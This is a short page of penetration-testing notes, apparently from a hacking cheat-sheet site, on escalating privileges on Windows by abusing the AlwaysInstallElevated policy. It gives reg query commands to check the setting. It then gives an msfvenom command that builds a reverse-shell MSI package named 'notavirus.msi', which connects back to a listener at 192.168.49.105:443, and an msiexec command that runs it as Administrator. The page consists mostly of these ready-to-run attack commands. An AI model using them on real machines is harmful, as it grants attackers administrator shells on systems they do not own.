Priv Escalation

Exploiting AlwaysInstallElevated.

Detection:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both commands have the output: AlwaysInstallElevated REG_DWORD 0x1.

We can exploit this by generating a reverse msi that would connect back to us as Administrator.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.105 LPORT=443 -f msi -o notavirus.msi

Then

msiexec /i "C:\Path\TO\malicous.msi"

PreviousExploitation

Last updated 2 years ago